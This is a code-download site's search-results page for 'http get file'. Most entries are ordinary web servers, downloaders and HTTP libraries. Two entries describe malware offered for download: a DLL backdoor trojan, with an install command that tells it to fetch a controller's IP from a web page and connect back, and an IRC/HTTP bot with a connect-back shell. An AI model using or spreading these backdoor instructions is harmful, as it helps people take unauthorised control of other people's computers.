Welcome![Sign In][Sign Up]
Location:
Search - http get file

Search list

[Web Server用Java实现Web服务器

Description: 用Java实现Web服务器 本文实现了GET请求的Web服务器程序的方法,通过创建ServerSocket类对象,监听端口8080; 等待、接受客户机连接到端口8080; 创建与socket字相关联的输入流和输出流 然后,读取客户机的请求信息,若请求类型是GET,则从请求信息中获取所访问的HTML文件名,如果HTML文件存在,则打开HTML文件,把HTTP头信息和HTML文件内容通过socket传回给Web浏览器,然后关闭文件。否则发送错误信息给Web浏览器。最后,关闭与相应Web浏览器连接的socket字。-Java Web server is to achieve a GET request to the Web server, through the creation of ServerSocket class object, bugging port 8080; Wait, a client is connected to port 8080; Socket character creation and the associated input and output streams flow then read the client's request information, if the request is the type of GET, request information from being accessed visit HTML document, and if the HTML document exists, then open the HTML file, HTTP headers and HTML files through the socket sent back to the Web browser and then close the file. Otherwise, send the wrong message to the Web browser. Finally, the closing and the corresponding Web browser connected to the socket word.
Platform: | Size: 10425 | Author: 雨岳 | Hits:

[Delphi VCLFastDown1.1

Description: 软件主页: www.gfastdown.com 文件说明: FastDownActiveX.zip ActiveX版 FastDownCB6.zip C++ Builder6 静态库 FastDownVC6.zip VC++ 6 静态库 FastDownVC7.zip VC++ 7 静态库 TestFastDown.zip 测试程序 TestFastDownSrcVC6.zip 测试程序源代码(VC版) TestFastDownSrcVB6.zip 测试程序源代码(VB版) FastDownHelp.zip 帮助文档 特点: 支持HTTP、FTP协议,支持HTTP CHUNKED编码,支持HTTP GET、POST方法,支持重定向、Cookie。 支持获取FTP目录内容。 支持断点续传,支持将文件分成多块同时下载,可任意指定分块数,下载速度快,CPU占用率低。 支持从多个地址下载同一个文件。 支持同步模式,异步模式。 支持SOCKS4,SOCKS5,HTTP1.1代理。 可提供C++静态库(VC6、VC7、VC8、C++ Builder),可提供ActiveX版本(支持C++ Builder、Delphi、VB、VC++、C#、VB.net、Delphi.net)。 全部代码不依赖于MFC,不依赖于WININET库,方便移植。 接口简单,灵活。 支持Win98,WinMe,Win2000, Windows XP,Windows 2003-software Home : www.gfastdown.com documents : FastDownActiveX.zip ActiveX version FastDownCB6.z ip C Builder6 static FastDownVC6.zip VC six static FastD ownVC7.zip VC 7 TestFastDown.zip the static test procedure Test FastDownSrcVC6.zip testing program source code (VC version) TestFastDo wnSrcVB6.zip testing program source code (VB Edition) FastDownHelp.zip help documentation features : support for HTTP, FTP, HTTP support CHUNKED coding, supports HTTP GET, POST, the support redirect, Cookie. Support FTP access to directory content. Supports HTTP, support the file into several pieces, while downloading can be arbitrarily designated a few blocks, download speed, CPU utilization rate is low. Support downloaded from the same number of addresses in a document. Synchronous, asynchronous mode. Sup
Platform: | Size: 3208536 | Author: zxq | Hits:

[Remote Control050615adminchick-backdoor

Description: 注入进程的 超强DLL后门木马 支持系统 2000以上, 功能: 1.支持密码验证 2.cmd命令 3.上传下载 安装: 要用到的程序. install.exe 和 ServerDll.dll 在CMD下 运行 install -h http://www.donews.net/xxx/archive/2004/09/26/110321.aspx -p 1234567 -h 后面接的是一个网页的地址。网页里面包含自己的IP和端口,肉鸡读到后,会进行反弹连接 -p 后面是认证密码 在静态网页中,必须包含 例如 ###HOST:192.168.0.2:8288@@@ 的特征字符串 其中的###和@@@不可少 HOST:后面接控制端的IP。 :后面是控制端的端口号。可以自己修改。可以使用80 或 8080 上传命令: -put <源文件> <目标文件> 上传到肉鸡的WindowsDirectory下,如2000的WINNT xp的WINDOWS 下载命令: -get <源文件> <目标文件> 建议可以去申请一个免费的Blog,修改起来也很方便。 控制端: MC.exe。主要用于动态肉鸡的管理,例如ADSL拨号用户肉鸡的管理。保证肉鸡不丢失-injection process superpower backdoor Trojan DLL support more than 2,000 systems, functions : 1. Support for password verification 2.cmd three orders. Uploading and downloading Installation : use of the procedure. INSTALL.exe ServerDll.dll the CMD and running install-h http:// www.donews.net/xxx/archive/2004/09/26/110321.aspx-p 1234567-h, followed is a website address. The website which contains its own IP and ports, broiler read, the link will rebound-p password authentication is behind the static pages, for example, must contain # # # HOST : @ @ @ 192.168.0.2:8288 features the String # # # @ @ @ essential HOST : control-followed by the IP. : Back of the control side of the port. Changes can own. 80 can be used to upload or 8080 orders :-put lt; Source gt; Lt; The target file gt; Uploaded
Platform: | Size: 110566 | Author: aaaa | Hits:

[Web Server用Java实现Web服务器

Description: 用Java实现Web服务器 本文实现了GET请求的Web服务器程序的方法,通过创建ServerSocket类对象,监听端口8080; 等待、接受客户机连接到端口8080; 创建与socket字相关联的输入流和输出流 然后,读取客户机的请求信息,若请求类型是GET,则从请求信息中获取所访问的HTML文件名,如果HTML文件存在,则打开HTML文件,把HTTP头信息和HTML文件内容通过socket传回给Web浏览器,然后关闭文件。否则发送错误信息给Web浏览器。最后,关闭与相应Web浏览器连接的socket字。-Java Web server is to achieve a GET request to the Web server, through the creation of ServerSocket class object, bugging port 8080; Wait, a client is connected to port 8080; Socket character creation and the associated input and output streams flow then read the client's request information, if the request is the type of GET, request information from being accessed visit HTML document, and if the HTML document exists, then open the HTML file, HTTP headers and HTML files through the socket sent back to the Web browser and then close the file. Otherwise, send the wrong message to the Web browser. Finally, the closing and the corresponding Web browser connected to the socket word.
Platform: | Size: 10240 | Author: 雨岳 | Hits:

[Delphi VCLFastDown1.1

Description: 软件主页: www.gfastdown.com 文件说明: FastDownActiveX.zip ActiveX版 FastDownCB6.zip C++ Builder6 静态库 FastDownVC6.zip VC++ 6 静态库 FastDownVC7.zip VC++ 7 静态库 TestFastDown.zip 测试程序 TestFastDownSrcVC6.zip 测试程序源代码(VC版) TestFastDownSrcVB6.zip 测试程序源代码(VB版) FastDownHelp.zip 帮助文档 特点: 支持HTTP、FTP协议,支持HTTP CHUNKED编码,支持HTTP GET、POST方法,支持重定向、Cookie。 支持获取FTP目录内容。 支持断点续传,支持将文件分成多块同时下载,可任意指定分块数,下载速度快,CPU占用率低。 支持从多个地址下载同一个文件。 支持同步模式,异步模式。 支持SOCKS4,SOCKS5,HTTP1.1代理。 可提供C++静态库(VC6、VC7、VC8、C++ Builder),可提供ActiveX版本(支持C++ Builder、Delphi、VB、VC++、C#、VB.net、Delphi.net)。 全部代码不依赖于MFC,不依赖于WININET库,方便移植。 接口简单,灵活。 支持Win98,WinMe,Win2000, Windows XP,Windows 2003-software Home : www.gfastdown.com documents : FastDownActiveX.zip ActiveX version FastDownCB6.z ip C Builder6 static FastDownVC6.zip VC six static FastD ownVC7.zip VC 7 TestFastDown.zip the static test procedure Test FastDownSrcVC6.zip testing program source code (VC version) TestFastDo wnSrcVB6.zip testing program source code (VB Edition) FastDownHelp.zip help documentation features : support for HTTP, FTP, HTTP support CHUNKED coding, supports HTTP GET, POST, the support redirect, Cookie. Support FTP access to directory content. Supports HTTP, support the file into several pieces, while downloading can be arbitrarily designated a few blocks, download speed, CPU utilization rate is low. Support downloaded from the same number of addresses in a document. Synchronous, asynchronous mode. Sup
Platform: | Size: 3208192 | Author: zxq | Hits:

[Remote ControlHTTP_IRC_bot

Description: A remote administratio/bot source. Get command through either http or irc. Can execute a command on a specific time, uses simple XOR encryption for command file transfer. Also has embeded a replacemed connect-back shell. The structure of the command file is explained in the source. [Use visual studio 2008]
Platform: | Size: 2190336 | Author: DarkK | Hits:

[JSP/JavaHTTP

Description: 简单WEB服务器,能够通过HTTP GET命令获得一个简单的文件-A simple WEB server through HTTP GET command to obtain a simple file
Platform: | Size: 8192 | Author: linchao | Hits:

[Delphi VCLHttpGetFile

Description: http get file command line util
Platform: | Size: 351232 | Author: Jay | Hits:

[Browser ClientDownloader

Description: 用C语言编写的Http get功能,可以查看http header, 可以下载任意文件,包含Windows UI和窗口过程函数-Written in C language with the Http get features, you can view the http header, you can download any file that contains the Windows UI and window process function
Platform: | Size: 45056 | Author: lyz | Hits:

[Sniffer Package captureWebWatch

Description: C#实现抓取Http文件进行分析,实现GZip编码解压缩,及自动生成Form表单-Get http file and analysis, decocde gzip stream and buid auto form.
Platform: | Size: 126976 | Author: zero_create | Hits:

[Web ServerCSharp_Simulation_IIS_SeverGET_POST

Description: 建于: 2010-12-12 作者: kevery / 香門 QQ:214958266 目的: 模拟IIS服务器 当前: 测试模块效果 测试环境:Visual Studio 2005 C# .NET Framework 2.0 windows 7 用途: 建立简单C/B/S模式转输数据. 优点: 采用HTTP方式(方式:POST GET) ,简单,实用. GET方式时,访问未指明的文件名时,默认访问:index.html文件,即默认主页-Built in: 2010-12-12 On: kevery/Hong door QQ: 214958266 AIM: To simulate the current IIS server: test module effects test environment: Visual Studio 2005 C# . NET Framework 2.0 windows 7 uses: to create a simple C/B/S mode switch to transmission data. advantages: The HTTP method (method: POST GET), a simple and practical. GET mode, the access to the file name is not specified, the default access: index.html file, which is the default home page
Platform: | Size: 179200 | Author: 香门 | Hits:

[Internet-Networkw

Description: a) 能发送HTTP的GET消息,从任何WEB服务器中获取指定WEB页面; b) 获取WEB页面后,能将页面保存为本地文件index.html; c) 能显示index.html文件源码 d) 能调用Linux系统中的Web浏览器(如mozilla)正确显示index.html页面。 -a) can send an HTTP GET message, WEB page from any Web server to obtain the specified b) access to the WEB page can page is saved as a local file index.html, c) shows the index.html file source d) can Linux system is called a Web browser (eg mozilla) the right to display the index.html page.
Platform: | Size: 2048 | Author: lqc | Hits:

[Internet-NetworkFile-Transmit-Source-Code

Description: 【软件名称】 支持多线程断点续传的文件传输(FTP)程序(含服务端和客户端、支持蓝牙(Bluetooth)传输) 【版 本】 1.0.0 【操作系统】 Windows 桌面系列、Windows Mobile 【作 者】 谢红伟 · chrys · chrys@163.com · http://www.viction.net 【软件说明】 可用来在计算机与计算机之间传输文件,还可用来在智能手机之间通过蓝牙、无线网络、数据线传输文件,支持多线程和断点续传,代码已经封装成一个dll库,可以作为服务器来使用,也可以当作客户端来使用,服务端支持蓝牙(Bluetooth)接入,并提供详细的测试程序,代码勿须任何修改用VS2005或VS2008编译一下即可拿到Windows Mobile中手机中使用。 你可以任意修改复制本代码,但请保留这段文字不要修改。 希望我能为中国的软件行业尽一份薄力! 【开发日期】 2008-08-16 13:02:34-e-[Software name] to support multi-threaded HTTP file transfer (FTP) program (including services and client support Bluetooth (Bluetooth) transmission) [version] 1.0.0 [operating system] Windows desktop series, the Windows Mobile [ ] Xie Hongwei Chrys chrys@163.com http://www.viction.net [the software] can be used to transfer files between computers, can also be used between the smart phone via Bluetooth, the wireless network. data cable to transfer files, support multi-threading and HTTP code has been packaged as a dll library that can be used as a server, can also be used as a client, server-side support Bluetooth (Bluetooth) access, and provide detailed testing procedures, the code goes without any changes to compile with VS2005 or VS2008 you can look to get a Windows Mobile phone use. You can modify a copy of the code, but please keep this text do not modify. I hope I can do something for China' s software industry, the thin edge [Build date 2008-08-16 13:02:34-err
Platform: | Size: 321536 | Author: dzw | Hits:

[Internet-Networklhttp

Description: 一个简单的http服务器支持http get文件传输-A simple http server supports http get file transfer
Platform: | Size: 9216 | Author: 陈张 | Hits:

[CSharpDownloader

Description: 使用了多线程技术,每个任务一条线程,不过只支持HTTP协议的文件下载,FTP协议的没测试,也没想弄这方面-Not tested using multi-threading technology, one thread for each task, but only supports the HTTP protocol file downloads, FTP protocol, but also thought to get this regard
Platform: | Size: 97280 | Author: luming | Hits:

[androidandroid-async-http-master

Description: 网络异步获取上传的工具类,异步获取网络数据,还有上传文件,下载文件的功能。-AsyncHttpClient net get post,file upload and download,it s very good
Platform: | Size: 543744 | Author: 口水 | Hits:

[source in ebookweb_server

Description: 服务器监听80端口,提供WEB服务,能够响应浏览器发送的的HTTP GET请求,向浏览器返回静态HTML页面: 1、如果请求的URL是一个文件,并且该文件存在,返回请求的页面或文件。 2、如果这个文件不存在,返回404错误。 3、如果请求的是一个目录,返回目录的结构给客户端。 服务器通过fork子进程处理新的请求,实现并发处理。服务器能够记录访问日志,包括时间、客户端的IP地址和请求的URL。 -Server listens on port 80 to provide WEB service, able to respond to HTTP GET request sent by the browser, and the browser returns a static HTML page: 1, URL if the request is for a file, and the file exists, returns the requested page or file. 2. If this file does not exist, returns a 404 error. 3. If the request is a directory, the directory structure is returned to the client. By fork child process server processing new requests, concurrent processing. Server access log to record, including the URL of time, the client s IP address and request.
Platform: | Size: 3072 | Author: 张三 | Hits:

[JSP/Javahttpcmparser

Description: 通过连接http,得到返回的数据,并将返回的数据,解析出来,生成csv文件(By connecting HTTP, get the returned data, and parse out the returned data to generate the CSV file)
Platform: | Size: 54272 | Author: wdnxcm | Hits:

[Linux-UnixDesktop

Description: c语言实现的http上传文件代码,并获取设备的ip地址,mac地址,根据mac地址获取随机数(C language to achieve HTTP upload file code, and get the IP address of the device, MAC address, according to the MAC address to get the random number.)
Platform: | Size: 2048 | Author: qbxu85 | Hits:

[Windows Developpb11.5_url_test

Description: pb11.5 + pbni + libcurl 调用http、https,实现了get、post(返回文本支持gzip解压,post支持gzip压缩上传)、文件上传、下载(带进度条显示);提供同步、异步两种操作方式;pb11.5以上版本,可自行升级,应该可以使用,11.5以下版本不支持。(Pb11.5 + pbni + libcurl calls HTTP and HTTPS,realizes get,post (return text supports gzip decompression, post supports gzip compression upload),file upload and download(with progress bar display);provides two operation modes, synchronous and asynchronous;pb11.5 and above can be upgraded by itself, should be able to use; and less than 11.5 does not support.)
Platform: | Size: 210944 | Author: ganzhenyu001 | Hits:
« 12 3 4 5 »

CodeBus www.codebus.net